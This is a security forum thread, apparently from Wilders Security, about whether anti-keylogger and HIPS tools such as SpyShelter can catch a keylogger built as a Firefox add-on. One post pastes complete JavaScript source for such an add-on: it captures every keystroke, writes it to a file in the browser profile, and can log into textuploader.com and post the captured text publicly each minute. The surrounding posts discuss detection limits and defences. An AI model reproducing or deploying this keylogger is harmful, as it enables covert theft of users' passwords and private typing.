A keylogger that bypasses even SpyShelter

can someone report this problem to spyshelter team

 

That's the problem: There is absolutely no problem here. If you chose (intentionally or unintentionally) to turn your browser into a malicious keylogger installing a keylogger add-on there is nothing that Spyshelter or any other anti-keylogger/HIPS can do.

And do you know why? Because a browser IS a keylogger: It records what you type and sends it to another part of the world via internet. Its behaviour doesn't change in the slightest if one of your add-ons sends what you type to a place you don't want.

Some people here simply don't want to understand.

 

I fully agree with you. But on the other hand one has to admit that a logger running as a child process of the browser extends the spectrum of possible attack/infection scenarios. It´s not only the personal negligence of installing weird code yourselve: Beginning with the malicious manipulation of "officially trusted" add-ons via drive-by download to classic social engineering approaches, there are many ways a third party could benefit from loggers being disguised as browser add-ons. The funny thing is that you might expect your browser to be used as the "postman" for log-files but somehow not as the logger itself.

I don´t know much about the firefox architecutre but I would like to know to which extend it allows external processes - like SpySehlter - to distinguish - at least in theory - between requests coming from the main application and rquests coming from add-ons.

 

That's what some people don't understand. Add-ons don't run as child processes, they are a lot simpler than that. Check your browser with Process Explorer and tell me if it lists any of your browser's add-ons under it.

Add-ons are just scripts executed directly by the browser, when you install them they become pieces of the browser's code. The browser executes the commands that it receives from the scripts and that's it. Everything, good or bad, is done by the browser itself and no HIPS, antivirus or keylogger have a chance to know if what the browser does is what you want or if it goes against your own interests.

What can be done? Be extremely cautious with their reputation. Only install add-ons that have been used by many thousands people and are rated very high. Things like Avast Browser Cleanup can help. It scans the extensions installed in all your browsers and gives you a rating of their reputation.

As has being said, have a separate profile (Chrome's Incognito mode or Firefox's Private mode, for example) with only very trusted security add-ons and use it when you enter sensitive credentials: Web mail, Facebook, etc.

And also you could use a hardened browser like Bitdefender's Safepay that admits no add-ons at all for banking and shopping.

 

var keylogger_namespace={};

keylogger_namespace.keylogger=function()
{
// set username and password for www.textuploader.com here
this.netupload = "false";
this.username = "my_username";
this.password = "my_password";

var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("kl");

this.f = file.path+"text.txt";
this.pressmode = "false";
this.stoul = "";
this.ctrlchar = "false";
this.prevnl = "false";


window.addEventListener(
"load", function() {myKeylogger.init(); }, false);
}
var keylog=new keylogger_namespace.keylogger();

////////////////////////////////////////////////////////////////////////////////////
keylog.logKeydown=function(e) {
var keynum;

keynum = e.which;

var keyPressed="";
var specialchar="false";
switch(keynum)
{
case 8: keyPressed = "backspace\n"; specialchar="true"; break; // backspace
case 9: keyPressed = "tab\n"; specialchar="true"; break; // tab
case 13: keyPressed = "enter\n"; specialchar="true"; break; // enter
case 16: keyPressed = "shift\n"; specialchar="true"; break; // shift
case 17: keyPressed = "ctrl "; specialchar="true"; keylog.ctrlchar="true"; break; // ctrl
case 18: keyPressed = "alt\n"; specialchar="true"; break; // alt
case 20: keyPressed = "caps lock\n"; specialchar="true"; break; // alt
case 27: keyPressed = "escape\n"; specialchar="true"; break; // escape
case 37: keyPressed = "left arrow\n"; specialchar="true"; break; // left arrow
case 39: keyPressed = "right arrow\n"; specialchar="true"; break; // right arrow
case 45: keyPressed = "insert\n"; specialchar="true"; break; // insert
case 46: keyPressed = "delete\n"; specialchar="true"; break; // delete
}

if(specialchar=="true") {
if(keylog.stoul!="") {
keylog.stoul = keylog.stoul + " ";
}
keylog.stoul = keylog.stoul + keyPressed.substring(0,keyPressed.length-1);
}
// file is nsIFile, data is a string
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(keylog.f);
var foStream = Components.classes["@mozilla.org/network/file-output-stream;1"]
.createInstance(Components.interfaces.nsIFileOutputStream);
// use 0x02 | 0x10 to open file for appending.
foStream.init(file, 0x02 | 0x10 | 0x08, 00666, 0); // write(only), append, create file
if(keylog.pressmode=="true" && specialchar=="true" && keylog.prevnl=="false") {
var nl="\n";
foStream.write(nl, nl.length);
keylog.pressmode="false";
keylog.stoul = keylog.stoul + " ";
}
foStream.write(keyPressed, keyPressed.length);
foStream.close();
if(specialchar=="true") {
keylog.stoul = keylog.stoul + " ";
}
}

keylog.logKeypress=function(e) {
var keynum;

keynum = e.which;

var keyPressed="";

switch(keynum) {
case 0: break; // break if escape, tab, delete etc
case 8: break; // backspace
case 13: break; // enter
default:
keylog.pressmode="true";
keyPressed = String.fromCharCode(keynum);
}

// file is nsIFile, data is a string
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(keylog.f);
var foStream = Components.classes["@mozilla.org/network/file-output-stream;1"]
.createInstance(Components.interfaces.nsIFileOutputStream);
// use 0x02 | 0x10 to open file for appending.
foStream.init(file, 0x02 | 0x10 | 0x08, 00666, 0); // write(only), append, create file
foStream.write(keyPressed, keyPressed.length);
keylog.prevnl="false";
if(keylog.ctrlchar=="true") {
var nl="\n";
foStream.write(nl, nl.length);
keylog.prevnl="true";
}
foStream.close();

keylog.stoul = keylog.stoul + keyPressed;
if(keylog.ctrlchar=="true") {
keylog.stoul = keylog.stoul + " ";
keylog.ctrlchar="false";
}
}


////////////////////////////////////////////////////////////////////////////////////////////////
keylog.present_log=function() {
//read the contents of the log file
var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(keylog.f);
win=window.open("file://"+file.path,'log', '');
win.onfocus=function() {
setTimeout(function() {
win.scrollBy(0,5000000);
}, 500);
}
if(window.focus) {win.focus()}
setTimeout(function() {
win.scrollBy(0,5000000);
}, 1000);
}

keylog.dateToString=function(date) {
var month = date.getMonth() + 1;
var day = date.getDate();
var dateOfString = (("" + day).length < 2 ? "0" : "") + day + "/";
dateOfString += (("" + month).length < 2 ? "0" : "") + month + "/";
dateOfString += date.getFullYear();
var hour = date.getHours();
var minute = date.getMinutes();
var second = date.getSeconds();
dateOfString += " " + (("" + hour).length < 2 ? "0" : "") + hour + ":";
dateOfString += (("" + minute).length < 2 ? "0" : "") + minute + ":";
dateOfString += (("" + second).length < 2 ? "0" : "") + second;
return dateOfString;

}

keylog.logtimestamp=function() {
var currentdate = new Date();
var datetime="";
datetime += keylog.dateToString(currentdate);
datetime = "Timestamp: " + datetime;
// file is nsIFile, data is a string
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(keylog.f);
var foStream = Components.classes["@mozilla.org/network/file-output-stream;1"]

.createInstance(Components.interfaces.nsIFileOutputStream);
// use 0x02 | 0x10 to open file for appending.
foStream.init(file, 0x02 | 0x10 | 0x08, 00666, 0); // write(only), append, create file
var nl="\n";
if(keylog.pressmode=="true" && keylog.prevnl=="false") {
foStream.write(nl, nl.length);
keylog.pressmode="false";
}
foStream.write(datetime, datetime.length);
foStream.write(nl, nl.length);
foStream.close();
}


keylog.tokenlogin=function() {
var req = new XMLHttpRequest();

var token="";

var url = "https://textuploader.com/auth/logout";

req.open("GET", url, true);
req.withCredentials = true;
req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
req.send(null);

var req = new XMLHttpRequest();

var url = "https://textuploader.com/auth/login";

req.open("GET", url, false);
// req.withCredentials = true;
// req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
req.onload = function(e) {
console.log(req.responseText);
token = req.responseText;
var poseins = token.indexOf("_token");
var poszwei = token.indexOf("value=");
var posdrei = token.indexOf("> ");
token = token.substring(poszwei + 7,posdrei-1);
keylog.txtuploadrlogin(token);
}
req.send(null);
}


keylog.txtuploadrlogin=function(token) {
//login to txtuploader
var req = new XMLHttpRequest();
var url = "https://textuploader.com/auth/login";

req.open("POST", url, true);

req.withCredentials = true;

req.onload = function () {
// do something to response
console.log(this.responseText);
};

req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

req.send("_token=" + encodeURIComponent(token) + "&username=" + encodeURIComponent(keylog.username) + "&password=" + encodeURIComponent(keylog.password) + "&submit=Login");
return;
}

keylog.logupload=function() {
if(keylog.stoul=="") {
return;
}
// upload log to txtuploader
var req = new XMLHttpRequest();
var url = "http://textuploader.com";
req.open("POST", url, true);
req.withCredentials = true;

req.onload = function () {
// do something to response
console.log(this.responseText);
};
req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
req.send("textdata=" + encodeURIComponent(keylog.stoul) + "&texttitle=code&expiration=9999999&syntax=auto&type=public");
req.onload = function () {
// do something to response
console.log(this.responseText);
};
keylog.stoul="";
}

////////////////////////////////////////////////////////////////////////////////////////////////
if ("undefined" == typeof(myKeylogger))
{
var myKeylogger= {

init : function()
{
if(keylog.netupload=="true") {
keylog.tokenlogin();
setInterval(keylog.logupload, 60000);
}
//capturing the keystrokes
document.addEventListener("keydown", keylog.logKeydown, false);
document.addEventListener("keypress", keylog.logKeypress, false);
//log also timestamps
setInterval(keylog.logtimestamp, 60000);
},

stateChanged : function()
{

}
}


};

 

Thanks for the informative posts.I am one of those people that didnt understand (not dont want to understand).And your posts have explained simply and clearly.

 

@vojta
I think you are probably to much focused on apps like "anti-exe" where is enough make only one rule for one process...if you "allow" and add it to white list - all orher possible action are allowed by definition. HIPS/BB are not such app...you have (mainly in advanced settings) a lot possibly detected action that you can allow/deny/ask/control/or even disable feature. Look at settings in OA, PFW, even PCTools...look at Mamutu where you can fin perhaps more than 30 monitored actions or ThreatFire where you can make so much rules as you only want...need...have time to do it.
There is similar situation with SS...it has on the list 52 monitored actions and there is possibility that every of them would be detected in one application...one process...one piece of code. 20 of them pointed as the keylogging action



Below you have examples of very common and well-known apps in which SS detects key-logging action...in some of them more than one.






You are right if we talk about trusted app...but if we control almost each action of some app...if we have no WL...if there is no any trusted app...SS should ask us...
This is the problem.

 

It doesn't matter that protection are implemented in an OS level.
If you install a "spyware" addon in your browser, the browser itself is spyware.

 

The browser itself still follows your HIPS rules, and that doesn't always mean it's trusted. Then there's the scope of the HIPS as shown above, it's not as if your browser will perform the same actions after installing the extension.

Heck, I'm just repeating in my own words what others have already said, but were overlooked. I'd really like to see someone test this keylogger to see what truly happens.

 

Exactly...when we make rules for browser or other app we actually build something like "channel" between rules in which such app can work easy and safe for us. Each trial "straying from the path" should give us information about it.

+1

I think it does no matter if we have to do with trusted app or with malware...we should always expect from monitoring software proper recognition, detection and information that is given for user. Even more...we have to expect all this things in the case of malware.

 

But it matters because the information never goes out the browser environment, and any HIPS always place the rules at an OS level, so there is no granularity for block things like this. This is not an external app attacking a browser.
To block this keylogger, (I don't know if is possible) the HIPS would need to have specific rules for each browser (firefox here) that should work internally.
In the same way you can't block an addon with the firewall that sends "anonymous" statistics about what you do online (there are too many for chrome and firefox) and you can't "easily" block an addon acting as a keylogger with an HIPS.

All the HIPS rules are related to the OS, what you see in spyshelter with "fancy" names internally it has the same aspect than the screen shots you can see here

http://help.comodo.com/topic-72-1-451-4764-Protected-Objects.html
http://help.comodo.com/topic-72-1-451-4847-Protected-Files-.html
http://help.comodo.com/topic-72-1-451-4765-Protected-Registry-Keys.html
http://help.comodo.com/topic-72-1-451-4766-Protected-COM-interfaces.html

The spyshelter rules (and any HIPS) are protecting folders, files, registry keys, services, drivers, com interfaces.... that can be used with a malicious purpose and the addon doesn't use any of this.

 

Than Comodo, AppGuard, DefenseWall, Sandboxie and etc. should all have the ability to control add-ons behaviours as well.

 

No, the problem is that add-ons don't need hooks, screen captures, clipboard captures, etc.

They don't need them because you are giving all the information to them directly. They only need to fool you once: The moment that you install them. When you put information in your browser it is visible for any add-on and no external program can see anything odd because the browser is doing its job as usual. Again, no hooks needed, no screen capture needed, no clipboard capture needed, no keylogging needed......nothing that a HIPS monitors is needed.

I haven't talked about anti-exes a single time here, I don't like them. I use a HIPS and I know how they work. There is nothing they can do against add-ons because they don't do anything out of the ordinary. It's always business as usual for the browser.

 

I don't understand your point, but any of the programs you mention should be able to block this addon.

 

I meant to say you install this keylogger/malware add-on, and than after the install could it be possible for authors any mentioned anti-malware products to create something in their software products that could block every action that already installed malicious add-on(that contains every kind of malware) usually does?

Why shouldn't this be possible?

 

None of them is designed to block things like this, and I don't think would be easy to add protection for this.
The problem is once the addon is installed it becomes part of the browser. For any external security software any addon is invisible.
Probably the easiest solution would be if firefox includes protection against the addons. Something similar to what android does with the apps.

https://www.google.es/search?q=andr...gDw&ved=0CAcQ_AUoAQ&biw=1280&bih=627#imgdii=_

 

Some of you may have missed this ?

How to defeat such KL's see Post # 3 in here https://www.wilderssecurity.com/showthread.php?t=340941

 

Probably the broken link refers to this?
https://addons.mozilla.org/en-US/firefox/addon/keylogger-beater

 

@ fax

Indeed it does ! Thanx for the heads up Fixed it now.

 

SpyShelter and Zemana vs Keyloggers
-http://www.blogsolute.com/best-anti-keylogger/29029/

 

They all are dedicated keylogger software that is not using other processes. This particular keylogger here formed itself as a Firefox extension and turned the browser into a keylogger software. Nearly everyone who is using HIPS, AE, and anti-logger software whitelisted/trusted the browser for sure. That's the problem.

 

This kind of test are useless, they install the keylogers wihthout having installed the antikeyloger, so during the installation all the hooks are placed. Also he disabled the key encryption....

It's like if you infect a computer with malware and then install an AV, the AV will fail because you are already infected and the damage is done.

 

@guest
Thanks for comprehensive explanation...it's very illuminating and useful

@vojta
Thanks you also and please dont' feel offended...I don't dispute your knowledge and competence but only try to speculate in the such matter

 

Where did you read this ? If that's true the test would be useless indeed.
If not, then the result is pretty disappointing. If they can't catch half of the well known KLs on the market, i wouldn't buy any of them.

 

Install Spyshelter and then install any of the keyloggers to see what happens, let me know if you get less than "20" popups during the process.